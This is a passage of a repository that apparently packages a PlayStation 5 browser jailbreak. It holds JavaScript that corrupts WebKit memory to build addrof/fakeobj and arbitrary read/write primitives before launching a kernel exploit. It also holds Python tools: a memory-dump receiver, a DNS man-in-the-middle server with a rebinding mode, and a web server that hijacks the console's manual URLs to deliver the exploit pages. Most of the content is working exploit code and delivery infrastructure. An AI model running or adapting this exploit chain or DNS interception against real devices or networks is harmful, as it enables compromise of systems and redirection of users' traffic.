266 | needfix.push(post_ffs);
267 |
268 | for (var i = 0; i < 13; i++)
269 | bad_fonts[guessed_font + i].family = "hammer" + i;
270 |
271 | function boot_addrof(obj) {
272 | arrays[257][32] = obj;
273 | union_f[0] = arrays[258][0];
274 | return union_i[1] * 0x100000000 + union_i[0];
275 | }
276 |
277 | function boot_fakeobj(addr) {
278 | union_i[0] = addr;
279 | union_i[1] = (addr - addr % 0x100000000) / 0x100000000;
280 | arrays[258][0] = union_f[0];
281 | return arrays[257][32];
282 | }
283 |
284 | //craft misaligned typedarray
285 |
286 | var arw_master = new Uint32Array(8);
287 | var arw_slave = new Uint8Array(1);
288 | var obj_master = new Uint32Array(8);
289 | var obj_slave = {
290 | obj: null
291 | };
292 |
293 | var addrof_slave = boot_addrof(arw_slave);
294 | var addrof_obj_slave = boot_addrof(obj_slave);
295 | union_i[0] = structureid_low;
296 | union_i[1] = structureid_high;
297 | union_b[6] = 7;
298 | var obj = {
299 | jscell: union_f[0],
300 | butterfly: true,
301 | buffer: arw_master,
302 | size: 0x5678
303 | };
304 |
305 | function i48_put(x, a) {
306 | a[4] = x | 0;
307 | a[5] = (x / 4294967296) | 0;
308 | }
309 |
310 | function i48_get(a) {
311 | return a[4] + a[5] * 4294967296;
312 | }
313 |
314 | window.addrof = function (x) {
315 | obj_slave.obj = x;
316 | return i48_get(obj_master);
317 | }
318 |
319 | window.fakeobj = function (x) {
320 | i48_put(x, obj_master);
321 | return obj_slave.obj;
322 | }
323 |
324 | function read_mem_setup(p, sz) {
325 | i48_put(p, arw_master);
326 | arw_master[6] = sz;
327 | }
328 |
329 | window.read_mem = function (p, sz) {
330 | read_mem_setup(p, sz);
331 | var arr = [];
332 | for (var i = 0; i < sz; i++)
333 | arr.push(arw_slave[i]);
334 | return arr;
335 | };
336 |
337 | window.write_mem = function (p, data) {
338 | read_mem_setup(p, data.length);
339 | for (var i = 0; i < data.length; i++)
340 | arw_slave[i] = data[i];
341 | };
342 |
343 | window.read_ptr_at = function (p) {
344 | var ans = 0;
345 | var d = read_mem(p, 8);
346 | for (var i = 7; i >= 0; i--)
347 | ans = 256 * ans + d[i];
348 | return ans;
349 | };
350 |
351 | window.write_ptr_at = function (p, d) {
352 | var arr = [];
353 | for (var i = 0; i < 8; i++) {
354 | arr.push(d & 0xff);
355 | d /= 256;
356 | }
357 | write_mem(p, arr);
358 | };
359 |
360 | (function () {
361 | var magic = boot_fakeobj(boot_addrof(obj) + 16);
362 | magic[4] = addrof_slave;
363 | magic[5] = (addrof_slave - addrof_slave % 0x100000000) / 0x100000000;
364 | obj.buffer = obj_master;
365 | magic[4] = addrof_obj_slave;
366 | magic[5] = (addrof_obj_slave - addrof_obj_slave % 0x100000000) / 0x100000000;
367 | magic = null;
368 | })();
369 |
370 | //fix fucked objects to stabilize webkit
371 |
372 | (function () {
373 | //fix fontfaceset (memmoved 96 bytes to low, move back)
374 | var ffs_addr = read_ptr_at(addrof(post_ffs) + 8) - 208;
375 | write_mem(ffs_addr, read_mem(ffs_addr - 96, 208));
376 | //fix strings (restore "valid") header
377 | for (var i = 0; i < needfix.length; i++) {
378 | var addr = read_ptr_at(addrof(needfix[i]) + 8);
379 | write_ptr_at(addr, (HASHMAP_BUCKET - 20) * 0x100000000 + 1);
380 | write_ptr_at(addr + 8, addr + 20);
381 | write_ptr_at(addr + 16, 0x80000014);
382 | }
383 | //fix array butterfly
384 | write_ptr_at(butterfly + 248, 0x1f0000001f);
385 | })();
386 |
387 | //^ @sleirs' stuff. anything pre arb rw is magic, I'm happy I don't have to deal with that.
388 |
389 | //create compat stuff for kexploit.js
390 | let expl_master = new Uint32Array(8);
391 | let expl_slave = new Uint32Array(2);
392 | let addrof_expl_slave = addrof(expl_slave);
393 | let m = fakeobj(addrof(obj) + 16);
394 | obj.buffer = expl_slave;
395 | m[7] = 1;
396 | obj.buffer = expl_master;
397 | m[4] = addrof_expl_slave;
398 | m[5] = (addrof_expl_slave - addrof_expl_slave % 0x100000000) / 0x100000000;
399 | m[7] = 1;
400 |
401 | let prim = {
402 | write8: function (addr, value) {
403 | expl_master[4] = addr.low;
404 | expl_master[5] = addr.hi;
405 | if (value instanceof int64) {
406 | expl_slave[0] = value.low;
407 | expl_slave[1] = value.hi;
408 | } else {
409 | expl_slave[0] = value;
410 | expl_slave[1] = 0;
411 | }
412 | },
413 | write4: function (addr, value) {
414 | expl_master[4] = addr.low;
415 | expl_master[5] = addr.hi;
416 | if (value instanceof int64) {
417 | expl_slave[0] = value.low;
418 | } else {
419 | expl_slave[0] = value;
420 | }
421 | },
422 | write2: function (addr, value) {
423 | expl_master[4] = addr.low;
424 | expl_master[5] = addr.hi;
425 | let tmp = expl_slave[0] & 0xFFFF0000;
426 | if (value instanceof int64) {
427 | expl_slave[0] = ((value.low & 0xFFFF) | tmp);
428 | } else {
429 | expl_slave[0] = ((value & 0xFFFF) | tmp);
430 | }
431 | },
432 | write1: function (addr, value) {
433 | expl_master[4] = addr.low;
434 | expl_master[5] = addr.hi;
435 | let tmp = expl_slave[0] & 0xFFFFFF00;
436 | if (value instanceof int64) {
437 | expl_slave[0] = ((value.low & 0xFF) | tmp);
438 | } else {
439 | expl_slave[0] = ((value & 0xFF) | tmp);
440 | }
441 | },
442 | read8: function (addr) {
443 | expl_master[4] = addr.low;
444 | expl_master[5] = addr.hi;
445 | return new int64(expl_slave[0], expl_slave[1]);
446 | },
447 | read4: function (addr) {
448 | expl_master[4] = addr.low;
449 | expl_master[5] = addr.hi;
450 | return expl_slave[0];
451 | },
452 | read2: function (addr) {
453 | expl_master[4] = addr.low;
454 | expl_master[5] = addr.hi;
455 | return expl_slave[0] & 0xFFFF;
456 | },
457 | read1: function (addr) {
458 | expl_master[4] = addr.low;
459 | expl_master[5] = addr.hi;
460 | return expl_slave[0] & 0xFF;
461 | },
462 | leakval: function (obj) {
463 | obj_slave.obj = obj;
464 | return new int64(obj_master[4], obj_master[5]);
465 | }
466 | };
467 | window.p = prim;
468 | run_hax();
469 | }
--------------------------------------------------------------------------------
/dumpserver.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import time
3 | import struct
4 | import locale
5 |
6 | def server_program():
7 | host = '0.0.0.0'
8 | port = 5656
9 |
10 | server_socket = socket.socket()
11 | server_socket.bind((host, port))
12 |
13 | server_socket.listen(1)
14 | conn, address = server_socket.accept() # accept new connection
15 | conn.settimeout(60) # 60 second timeout
16 | print("Connection from: " + str(address))
17 |
18 |
19 | timestr = time.strftime("%Y%m%d-%H%M%S")
20 | print("[+] Writing dump to dump-" + timestr + ".bin...")
21 |
22 | total_received = 0
23 | with open("dump-" + timestr + ".bin", "wb") as f:
24 | while True:
25 | try:
26 | data = conn.recv(0x10000)
27 | total_received += len(data)
28 | print("Received " + str(total_received) + " bytes...")
29 | if not data:
30 | break
31 | f.write(data);
32 | except:
33 | break
34 | f.close()
35 | conn.close()
36 | server_socket.close()
37 |
38 | if __name__ == '__main__':
39 | server_program()
--------------------------------------------------------------------------------
/fakedns.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | """Fakedns.py: A regular-expression based DNS MITM Server by Crypt0s."""
3 |
4 | # This isn't the most elegent way - i could possibly support both versions of python,
5 | # but people should really not use Python 2 anymore.
6 | import sys
7 | vnum = sys.version.split()[0]
8 | if int(vnum[0]) < 3:
9 | print("Python 2 support has been deprecated. Please run FakeDNS using Python3!")
10 | sys.exit(1)
11 |
12 | import binascii
13 | import socket
14 | import re
15 | import sys
16 | import os
17 | import socketserver as SocketServer
18 | import signal
19 | import argparse
20 | import struct
21 | import random
22 | import configparser as ConfigParser
23 |
24 | # inspired from DNSChef
25 | class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
26 | def __init__(self, server_address, request_handler):
27 | self.address_family = socket.AF_INET
28 | SocketServer.UDPServer.__init__(
29 | self, server_address, request_handler)
30 |
31 |
32 | class UDPHandler(SocketServer.BaseRequestHandler):
33 | def handle(self):
34 | (data, s) = self.request
35 | respond(data, self.client_address, s)
36 |
37 |
38 | class DNSQuery:
39 | def __init__(self, data):
40 | self.data = data
41 | self.domain = b''
42 | tipo = (data[2] >> 3) & 15 # Opcode bits
43 | if tipo == 0: # Standard query
44 | ini = 12
45 | lon = data[ini]
46 | while lon != 0:
47 | self.domain += data[ini + 1:ini + lon + 1] + b'.'
48 | ini += lon + 1 # you can implement CNAME and PTR
49 | lon = data[ini]
50 | self.type = data[ini:][1:3]
51 | else:
52 | self.type = data[-4:-2]
53 |
54 | # Because python doesn't have native ENUM in 2.7:
55 | # https://en.wikipedia.org/wiki/List_of_DNS_record_types
56 | TYPE = {
57 | b"\x00\x01": "A",
58 | b"\x00\x1c": "AAAA",
59 | b"\x00\x05": "CNAME",
60 | b"\x00\x0c": "PTR",
61 | b"\x00\x10": "TXT",
62 | b"\x00\x0f": "MX",
63 | b"\x00\x06": "SOA"
64 | }
65 |
66 | # Stolen:
67 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
68 | def _is_shorthand_ip(ip_str):
69 | """Determine if the address is shortened.
70 | Args:
71 | ip_str: A string, the IPv6 address.
72 | Returns:
73 | A boolean, True if the address is shortened.
74 | """
75 | if ip_str.count('::') == 1:
76 | return True
77 | if any(len(x) < 4 for x in ip_str.split(':')):
78 | return True
79 | return False
80 |
81 | # Stolen:
82 | # https://github.com/learningequality/ka-lite/blob/master/python-packages/django/utils/ipv6.py#L209
83 | def _explode_shorthand_ip_string(ip_str):
84 | """
85 | Expand a shortened IPv6 address.
86 | Args:
87 | ip_str: A string, the IPv6 address.
88 | Returns:
89 | A string, the expanded IPv6 address.
90 | """
91 | if not _is_shorthand_ip(ip_str):
92 | # We've already got a longhand ip_str.
93 | return ip_str
94 |
95 | hextet = ip_str.split('::')
96 |
97 | # If there is a ::, we need to expand it with zeroes
98 | # to get to 8 hextets - unless there is a dot in the last hextet,
99 | # meaning we're doing v4-mapping
100 | if '.' in ip_str.split(':')[-1]:
101 | fill_to = 7
102 | else:
103 | fill_to = 8
104 |
105 | if len(hextet) > 1:
106 | sep = len(hextet[0].split(':')) + len(hextet[1].split(':'))
107 | new_ip = hextet[0].split(':')
108 |
109 | for _ in range(fill_to - sep):
110 | new_ip.append('0000')
111 | new_ip += hextet[1].split(':')
112 |
113 | else:
114 | new_ip = ip_str.split(':')
115 |
116 | # Now need to make sure every hextet is 4 lower case characters.
117 | # If a hextet is < 4 characters, we've got missing leading 0's.
118 | ret_ip = []
119 | for hextet in new_ip:
120 | ret_ip.append(('0' * (4 - len(hextet)) + hextet).lower())
121 | return ':'.join(ret_ip)
122 |
123 |
124 | def _get_question_section(query):
125 | # Query format is as follows: 12 byte header, question section (comprised
126 | # of arbitrary-length name, 2 byte type, 2 byte class), followed by an
127 | # additional section sometimes. (e.g. OPT record for DNSSEC)
128 | start_idx = 12
129 | end_idx = start_idx
130 |
131 | num_questions = (query.data[4] << 8) | query.data[5]
132 |
133 | while num_questions > 0:
134 | while query.data[end_idx] != 0:
135 | end_idx += query.data[end_idx] + 1
136 | # Include the null byte, type, and class
137 | end_idx += 5
138 | num_questions -= 1
139 |
140 | return query.data[start_idx:end_idx]
141 |
142 |
143 | class DNSFlag:
144 | # qr opcode aa tc rd ra z rcode
145 | # 1 0000 0 0 1 1 000 0000
146 | # accept a series of kwargs to build a proper flags segment.
147 | def __init__(self,
148 | qr=0b1, # query record, 1 if response
149 | opcode=0b0000, # 0 = query, 1 = inverse query, 2 = status request 3-15 unused
150 | aa=0b0, # authoritative answer = 1
151 | tc=0b0, # truncation - 1 if truncated
152 | rd=0b1, # recursion desired?
153 | ra=0b1, # recursion available
154 | z=0b000, # Reserved, must be zero in queries and responsed
155 | rcode=0b0000 # errcode, 0 none, 1 format, 2 server, 3 name, 4 not impl, 5 refused, 6-15 unused
156 | ):
157 |
158 | # pack the elements into an integer
159 | flag_field = qr
160 | flag_field = flag_field << 4
161 | flag_field ^= opcode
162 | flag_field = flag_field << 1
163 | flag_field ^= aa
164 | flag_field = flag_field << 1
165 | flag_field ^= tc
166 | flag_field = flag_field << 1
167 | flag_field ^= rd
168 | flag_field = flag_field << 1
169 | flag_field ^= ra
170 | flag_field = flag_field << 3
171 | flag_field ^= z
172 | flag_field = flag_field << 4
173 | flag_field ^= rcode
174 |
175 | self.flag_field = flag_field
176 |
177 | # return char rep.
178 | def pack(self):
179 | return struct.pack(">H", self.flag_field)
180 |
181 |
182 | class DNSResponse(object):
183 | def __init__(self, query):
184 | self.id = query.data[:2] # Use the ID from the request.
185 | self.flags = DNSFlag(aa=args.authoritative).pack()
186 | self.questions = query.data[4:6] # Number of questions asked...
187 | # Answer RRs (Answer resource records contained in response) 1 for now.
188 | self.rranswers = b"\x00\x01"
189 | self.rrauthority = b"\x00\x00" # Same but for authority
190 | self.rradditional = b"\x00\x00" # Same but for additionals.
191 | # Include the question section
192 | self.query = _get_question_section(query)
193 | # The pointer to the resource record - seems to always be this value.
194 | self.pointer = b"\xc0\x0c"
195 | # This value is set by the subclass and is defined in TYPE dict.
196 | self.type = None
197 | self.dnsclass = b"\x00\x01" # "IN" class.
198 | # TODO: Make this adjustable - 1 is good for noobs/testers
199 | self.ttl = b"\x00\x00\x00\x01"
200 | # Set by subclass because is variable except in A/AAAA records.
201 | self.length = None
202 | self.data = None # Same as above.
203 |
204 | def make_packet(self):
205 | try:
206 | return self.id + self.flags + self.questions + self.rranswers + \
207 | self.rrauthority + self.rradditional + self.query + \
208 | self.pointer + self.type + self.dnsclass + self.ttl + \
209 | self.length + self.data
210 | except Exception as e: #(TypeError, ValueError):
211 | print("[!] - %s" % str(e))
212 |
213 | # All classes need to set type, length, and data fields of the DNS Response
214 | # Finished
215 | class A(DNSResponse):
216 | def __init__(self, query, record):
217 | super(A, self).__init__(query)
218 | self.type = b"\x00\x01"
219 | self.length = b"\x00\x04"
220 | self.data = self.get_ip(record)
221 |
222 | @staticmethod
223 | def get_ip(dns_record):
224 | ip = dns_record
225 | # Convert to hex
226 | return b''.join(int(x).to_bytes(1, 'little') for x in ip.split('.'))
227 |
228 | # Implemented
229 | class AAAA(DNSResponse):
230 | def __init__(self, query, address):
231 | super(AAAA, self).__init__(query)
232 | self.type = b"\x00\x1c"
233 | self.length = b"\x00\x10"
234 | # Address is already encoded properly for the response at rule-builder
235 | self.data = address
236 |
237 | # Thanks, stackexchange!
238 | # http://stackoverflow.com/questions/16276913/reliably-get-ipv6-address-in-python
239 | def get_ip_6(host, port=0):
240 | # search only for the wanted v6 addresses
241 | result = socket.getaddrinfo(host, port, socket.AF_INET6)
242 | # Will need something that looks like this:
243 | # just returns the first answer and only the address
244 | ip = result[0][4][0]
245 |
246 | # Implemented
247 | class CNAME(DNSResponse):
248 | def __init__(self, query, domain):
249 | super(CNAME, self).__init__(query)
250 | self.type = b"\x00\x05"
251 |
252 | self.data = b""
253 | for label in domain.split('.'):
254 | self.data += chr(len(label)).encode() + label.encode()
255 | self.data += b"\x00"
256 |
257 | self.length = chr(len(self.data)).encode()
258 | # Must be two bytes.
259 | if len(self.length) < 2:
260 | self.length = b"\x00" + self.length
261 |
262 | # Implemented
263 | class PTR(DNSResponse):
264 | def __init__(self, query, ptr_entry):
265 | super(PTR, self).__init__(query)
266 | if type(ptr_entry) != bytes:
267 | ptr_entry = ptr_entry.encode()
268 |
269 | self.type = b"\x00\x0c"
270 | self.ttl = b"\x00\x00\x00\x00"
271 | ptr_split = ptr_entry.split(b'.')
272 | ptr_entry = b"\x07".join(ptr_split)
273 |
274 | self.data = b"\x09" + ptr_entry + b"\x00"
275 | self.length = chr(len(ptr_entry) + 2)
276 | # Again, must be 2-byte value.
277 | if self.length < "0xff":
278 | self.length = b"\x00" + self.length.encode()
279 |
280 | # Finished
281 | class TXT(DNSResponse):
282 | def __init__(self, query, txt_record):
283 | super(TXT, self).__init__(query)
284 | self.type = b"\x00\x10"
285 | self.data = txt_record.encode()
286 | self.length = chr(len(txt_record) + 1).encode()
287 | # Must be two bytes. This is the better, more python-3 way to calculate length. Swap to this later.
288 | if len(self.length) < 2:
289 | self.length = b"\x00" + self.length
290 | # Then, we have to add the TXT record length field! We utilize the
291 | # length field for this since it is already in the right spot
292 | self.length += chr(len(txt_record)).encode()
293 |
294 |
295 | class MX(DNSResponse):
296 | def __init__(self, query, txt_record):
297 | super(MX, self).__init__(query)
298 | self.type = b"\x00\x0f"
299 | self.data = b"\x00\x01" + self.get_domain(txt_record) + b"\x00"
300 | self.length = chr(len(txt_record) + 4)
301 | if self.length < '\xff':
302 | self.length = "\x00" + self.length
303 |
304 | @staticmethod
305 | def get_domain(dns_record):
306 | domain = dns_record
307 | ret_domain=[]
308 | for x in domain.split('.'):
309 | st = "{:02x}".format(len(x))
310 | ret_domain.append( st.decode("hex"))
311 | ret_domain.append(x)
312 | return "".join(ret_domain)
313 |
314 | class SOA(DNSResponse):
315 | def __init__(self, query, config_location):
316 | super(SOA, self).__init__(query)
317 |
318 | # TODO: pre-read and cache all the config files for the rules for speed.
319 | config = ConfigParser.ConfigParser(inline_comment_prefixes=";")
320 | config.read(config_location)
321 |
322 | # handle cases where we want the serial to be random
323 | serial = config.get(query.domain.decode(), "serial")
324 | if serial.lower() == "random":
325 | serial = int(random.getrandbits(32))
326 | else:
327 | # serial is still a str, cast to int.
328 | serial = int(serial)
329 |
330 | self.type = b"\x00\x06"
331 | self.mname = config.get(query.domain.decode(), "mname") # name server that was original or primary source for this zone
332 | self.rname = config.get(query.domain.decode(), "rname") # domain name which specified mailbox of person responsible for zone
333 | self.serial = serial # 32-bit long version number of the zone copy
334 | self.refresh = config.getint(query.domain.decode(), "refresh")# 32-bit time interval before zone refresh
335 | self.retry = config.getint(query.domain.decode(), "retry") # 32-bit time interval before retrying failed refresh
336 | self.expire = config.getint(query.domain.decode(), "expire") # 32-bit time interval after which the zone is not authoritative
337 | self.minimum = config.getint(query.domain.decode(), "minimum")# The unsigned 32 bit minimum TTL for any RR from this zone.
338 |
339 | # convert the config entries into DNS format. Convenient conversion function will be moved up to module later.
340 | def convert(fqdn):
341 | tmp = b""
342 | for domain in fqdn.split('.'):
343 | tmp += chr(len(domain)).encode() + domain.encode()
344 | tmp += b"\xc0\x0c"
345 | return tmp
346 |
347 | self.data = b""
348 |
349 | self.mname = convert(self.mname)
350 | self.data += self.mname
351 |
352 | self.rname = convert(self.rname)
353 | self.data += self.rname # already is a bytes object.
354 |
355 | # pack the rest of the structure
356 | self.data += struct.pack('>I', self.serial)
357 | self.data += struct.pack('>I', self.refresh)
358 | self.data += struct.pack('>I', self.retry)
359 | self.data += struct.pack('>I', self.refresh)
360 | self.data += struct.pack('>I', self.minimum)
361 |
362 | # get length of the answers area
363 | self.length = chr(len(self.data))
364 |
365 | # length is always two bytes - add the extra blank byte if we're not large enough for two bytes.
366 | if self.length < "0xff":
367 | self.length = b"\x00" + self.length.encode()
368 |
369 |
370 |
371 | # And this one is because Python doesn't have Case/Switch
372 | CASE = {
373 | b"\x00\x01": A,
374 | b"\x00\x1c": AAAA,
375 | b"\x00\x05": CNAME,
376 | b"\x00\x0c": PTR,
377 | b"\x00\x10": TXT,
378 | b"\x00\x0f": MX,
379 | b"\x00\x06": SOA,
380 | }
381 |
382 | # Technically this is a subclass of A
383 | class NONEFOUND(DNSResponse):
384 | def __init__(self, query):
385 | super(NONEFOUND, self).__init__(query)
386 | self.type = query.type
387 | self.flags = b"\x81\x83"
388 | self.rranswers = b"\x00\x00"
389 | self.length = b"\x00\x00"
390 | self.data = b"\x00"
391 | print(">> Built NONEFOUND response")
392 |
393 |
394 | class Rule (object):
395 | def __init__(self, rule_type, domain, ips, rebinds, threshold):
396 | self.type = rule_type
397 | self.domain = domain
398 | self.ips = ips
399 | self.rebinds = rebinds
400 | self.rebind_threshold = threshold
401 |
402 | # we need an additional object to track the rebind rules
403 | if self.rebinds is not None:
404 | self.match_history = {}
405 | self.rebinds = self._round_robin(rebinds)
406 | self.ips = self._round_robin(ips)
407 |
408 | def _round_robin(self, ip_list):
409 | """
410 | Creates a generator over a list modulo list length to equally move between all elements in the list each request
411 | Since we have rules broken out into objects now, we can have this without much overhead.
412 | """
413 | # check to make sure we don't try to modulo by zero
414 | # if we would, just add the same element to the list again.
415 | if len(ip_list) == 1:
416 | ip_list.append(ip_list[0])
417 |
418 | # should be fine to continue now.
419 | index = 0
420 | while 1: # never stop iterating - it's OK since we dont always run
421 | yield ip_list[index]
422 | index += 1
423 | index = index % len(ip_list)
424 |
425 | def match(self, req_type, domain, addr):
426 | # assert that the query type and domain match
427 | try:
428 | req_type = TYPE[req_type]
429 | except KeyError:
430 | return None
431 |
432 | try:
433 | assert self.type == req_type
434 | except AssertionError:
435 | return None
436 |
437 | try:
438 | assert self.domain.match(domain.decode())
439 | except AssertionError:
440 | return None
441 |
442 | # Check to see if we have a rebind rule and if we do, return that addr first
443 | if self.rebinds:
444 | if self.match_history.get(addr) is not None:
445 |
446 | # passed the threshold - start doing a rebind
447 | if self.match_history[addr] >= self.rebind_threshold:
448 | return next(self.rebinds)
449 |
450 | # plus one
451 | else:
452 | self.match_history[addr] += 1
453 |
454 | # add new client to this match history
455 | else:
456 | self.match_history[addr] = 1
457 |
458 | # We didn't trip on any rebind rules (or didnt have any)
459 | # but we're returning a rule-based entry based on the match
460 | return next(self.ips)
461 |
462 |
463 | # Error classes for handling rule issues
464 | class RuleError_BadRegularExpression(Exception):
465 | def __init__(self,lineno):
466 | print("\n!! Malformed Regular Expression on rulefile line #%d\n\n" % lineno)
467 |
468 |
469 | class RuleError_BadRuleType(Exception):
470 | def __init__(self,lineno):
471 | print("\n!! Rule type unsupported on rulefile line #%d\n\n" % lineno)
472 |
473 |
474 | class RuleError_BadFormat(Exception):
475 | def __init__(self,lineno):
476 | print("\n!! Not Enough Parameters for rule on rulefile line #%d\n\n" % lineno)
477 |
478 |
479 | class RuleEngine2:
480 |
481 | # replaces the self keyword, but could be expanded to any keyword replacement
482 | def _replace_self(self, ips):
483 | # Deal with the user putting "self" in a rule (helpful if you don't know your IP)
484 | for ip in ips:
485 | if ip.lower() == 'self':
486 | try:
487 | self_ip = socket.gethostbyname(socket.gethostname())
488 | except socket.error:
489 | print(">> Could not get your IP address from your " \
490 | "DNS Server.")
491 | self_ip = '127.0.0.1'
492 | ips[ips.index(ip)] = self_ip
493 | return ips
494 |
495 |
496 | def __init__(self, file_):
497 | """
498 | Parses the DNS Rulefile, validates the rules, replaces keywords
499 | """
500 |
501 | # track DNS requests here
502 | self.match_history = {}
503 |
504 | self.rule_list = []
505 |
506 | # A lol.com IP1,IP2,IP3,IP4,IP5,IP6 rebind_threshold%Rebind_IP1,Rebind_IP2
507 | with open(file_, 'r') as rulefile:
508 | rules = rulefile.readlines()
509 | lineno = 0 # keep track of line number for errors
510 |
511 | for rule in rules:
512 |
513 | # ignore blank lines or lines starting with hashmark (coments)
514 | if len(rule.strip()) == 0 or rule.lstrip()[0] == "#" or rule == '\n':
515 | # thank you to github user cambid for the comments suggestion
516 | continue
517 |
518 | # Confirm that the rule has at least three columns to it
519 | if len(rule.split()) < 3:
520 | raise RuleError_BadFormat(lineno)
521 |
522 | # break the rule out into its components
523 | s_rule = rule.split()
524 | rule_type = s_rule[0].upper()
525 | domain = s_rule[1]
526 | ips = s_rule[2].split(',') # allow multiple ip's thru commas
527 |
528 | # only try this if the rule is long enough
529 | if len(s_rule) == 4:
530 | rebinds = s_rule[3]
531 | # handle old rule style (maybe someone updated)
532 | if '%' in rebinds:
533 | rebind_threshold,rebinds = rebinds.split('%')
534 | rebinds = rebinds.split(',')
535 | rebind_threshold = int(rebind_threshold)
536 | else:
537 | # in the old days we assumed a rebind thresh of 1
538 | rebind_threshold = 1
539 | else:
540 | rebinds = None
541 | rebind_threshold = None
542 |
543 | # Validate the rule
544 | # make sure we understand this type of response
545 | if rule_type not in TYPE.values():
546 | raise RuleError_BadRuleType(lineno)
547 | # attempt to parse the regex (if any) in the domain field
548 | try:
549 | domain = re.compile(domain, flags=re.IGNORECASE)
550 | except:
551 | raise RuleError_BadRegularExpression(lineno)
552 |
553 | # replace self in the list of ips and list of rebinds (if any)
554 | ips = self._replace_self(ips)
555 | if rebinds is not None:
556 | rebinds = self._replace_self(rebinds)
557 |
558 | # Deal With Special IPv6 Nonsense
559 | if rule_type.upper() == "AAAA":
560 | tmp_ip_array = []
561 | for ip in ips:
562 | if ip.lower() == 'none':
563 | tmp_ip_array.append(ip)
564 | continue
565 | if _is_shorthand_ip(ip):
566 | ip = _explode_shorthand_ip_string(ip)
567 | ip = binascii.unhexlify(ip.replace(":", "")) #.decode('hex')
568 | tmp_ip_array.append(ip)
569 | ips = tmp_ip_array
570 |
571 |
572 | # add the validated and parsed rule into our list of rules
573 | self.rule_list.append(Rule(rule_type, domain, ips, rebinds, rebind_threshold))
574 |
575 | # increment the line number
576 | lineno += 1
577 |
578 | print(">> Parsed %d rules from %s" % (len(self.rule_list),file_))
579 |
580 |
581 | def match(self, query, addr):
582 | """
583 | See if the request matches any rules in the rule list by calling the
584 | match function of each rule in the list
585 | The rule checks two things before it continues so I imagine this is
586 | probably still fast
587 | """
588 | for rule in self.rule_list:
589 | result = rule.match(query.type, query.domain, addr)
590 | if result is not None:
591 | response_data = result
592 |
593 | # Return Nonefound if the rule says "none"
594 | if response_data.lower() == 'none':
595 | return NONEFOUND(query).make_packet()
596 |
597 | response = CASE[query.type](query, response_data)
598 |
599 | print(">> Matched Request - " + query.domain.decode())
600 | return response.make_packet()
601 |
602 | # if we got here, we didn't match.
603 | # Forward a request that we didnt have a rule for to someone else
604 |
605 | # if the user said not to forward requests, and we are here, it's time to send a NONEFOUND
606 | if args.noforward:
607 | print(">> Don't Forward %s" % query.domain.decode())
608 | return NONEFOUND(query).make_packet()
609 | try:
610 | s = socket.socket(type=socket.SOCK_DGRAM)
611 | s.settimeout(3.0)
612 | addr = ('%s' % (args.dns), 53)
613 | s.sendto(query.data, addr)
614 | data = s.recv(1024)
615 | s.close()
616 | print("Unmatched Request " + query.domain.decode())
617 | return data
618 | except socket.error as e:
619 | # We shouldn't wind up here but if we do, don't drop the request
620 | # send the client *something*
621 | print(">> Error was handled by sending NONEFOUND")
622 | print(e)
623 | return NONEFOUND(query).make_packet()
624 |
625 |
626 | # Convenience method for threading.
627 | def respond(data, addr, s):
628 | p = DNSQuery(data)
629 | response = rules.match(p, addr[0])
630 | s.sendto(response, addr)
631 | return response
632 |
633 | # Capture Control-C and handle here
634 | def signal_handler(signal, frame):
635 | print('Exiting...')
636 | sys.exit(0)
637 |
638 |
639 | if __name__ == '__main__':
640 |
641 | parser = argparse.ArgumentParser(description='FakeDNS - A Python DNS Server')
642 | parser.add_argument(
643 | '-c', dest='path', action='store', required=True,
644 | help='Path to configuration file')
645 | parser.add_argument(
646 | '-i', dest='iface', action='store', default='0.0.0.0', required=False,
647 | help='IP address you wish to run FakeDns with - default all')
648 | parser.add_argument(
649 | '-p', dest='port', action='store', default=53, required=False,
650 | help='Port number you wish to run FakeDns')
651 | parser.add_argument(
652 | '--rebind', dest='rebind', action='store_true', required=False,
653 | default=False, help="Enable DNS rebinding attacks - responds with one "
654 | "result the first request, and another result on subsequent requests")
655 | parser.add_argument(
656 | '--dns', dest='dns', action='store', default='8.8.8.8', required=False,
657 | help='IP address of the upstream dns server - default 8.8.8.8'
658 | )
659 | parser.add_argument(
660 | '--noforward', dest='noforward', action='store_true', default=False, required=False,
661 | help='Sets if FakeDNS should forward any non-matching requests'
662 | )
663 |
664 | # todo: remove this - it's confusing, and we should be able to set this per-record. Keep for now for quickness.
665 | parser.add_argument(
666 | '--non-authoritative', dest='non_authoritative', action='store_true', default=False, required=False,
667 | help='Sets if FakeDNS should not report as an authority for any matching DNS Queries'
668 | )
669 |
670 | args = parser.parse_args()
671 |
672 | # if non-authoritative is set to true, it'll cancel out the default authoritative setting
673 | # this is a not-very-coherent way to pull this off but we'll be changing the behavior of FakeDNS soon so it's OK
674 | args.authoritative = True ^ args.non_authoritative
675 |
676 | # Default config file path.
677 | path = args.path
678 | if not os.path.isfile(path):
679 | print('>> Please create a "dns.conf" file or specify a config path: ' \
680 | './fakedns.py [configfile]')
681 | exit()
682 |
683 | rules = RuleEngine2(path)
684 | rule_list = rules.rule_list
685 |
686 | interface = args.iface
687 | port = args.port
688 |
689 | try:
690 | server = ThreadedUDPServer((interface, int(port)), UDPHandler)
691 | except socket.error:
692 | print(">> Could not start server -- is another program on udp:{0}?".format(port))
693 | exit(1)
694 |
695 | server.daemon = True
696 |
697 | # Tell python what happens if someone presses ctrl-C
698 | signal.signal(signal.SIGINT, signal_handler)
699 | server.serve_forever()
700 | server_thread.join()
--------------------------------------------------------------------------------
/host.py:
--------------------------------------------------------------------------------
1 | import http.server, ssl, time, re #, cgi
2 |
3 | from http.server import BaseHTTPRequestHandler, SimpleHTTPRequestHandler, HTTPServer
4 |
5 | class RequestHandler(SimpleHTTPRequestHandler):
6 | def replace_locale(self):
7 | self.path = re.sub('^\/document\/(\w{2})\/ps5', '/document/en/ps5/', self.path)
8 |
9 | def do_GET(self):
10 | self.replace_locale()
11 | return super().do_GET()
12 |
13 | def do_POST(self):
14 | self.replace_locale()
15 | tn = self.path.lstrip('/document/en/ps5/')
16 | #print('!POST!: tn:\n' + tn)
17 | fn = tn + '.bin' # '.json'
18 | if (not tn.startswith("T_")):
19 | if (fn!="a.bin"):
20 | print('!POST!: INFO: ' + str(self.rfile.read(int(self.headers['Content-length']))),"utf-8")
21 | return
22 | else:
23 | fn = time.strftime("%Y%m%d-%H%M%S") + ".json"
24 |
25 | print('!POST!: ' + self.path + ' -->> ' + fn)
26 | print('test: %d'%int(self.headers['Content-length']))
